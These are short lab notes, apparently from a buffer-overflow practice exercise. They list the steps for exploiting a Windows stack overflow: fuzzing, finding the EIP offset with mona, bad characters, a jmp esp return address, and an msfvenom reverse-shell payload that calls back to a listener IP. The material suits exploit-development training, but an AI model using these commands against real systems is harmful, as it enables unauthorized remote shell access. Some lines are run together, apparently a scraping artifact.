Overflow3
1. Fuzz application to find number of bytes needed to crash the application
Bytes needed to crash application: 1300
2. Set mona configuration
!mona config -set workingfolder c:\mona\%p
3. Find EIP offset
EIP offset/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1300
!mona findmsp -distance 1300
EIP offset: 1274
4. Find bad characters
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Bad characters: \x00\x11\x40\x5f\xb8\xee
5. Find jmp esp instruction sets without any bad characters
jmp esp instruction sets without any bad characters!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"
Return address: 0x62501203
6. Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f c
7. Set nop sled in padding
nop sled in paddingLast updated
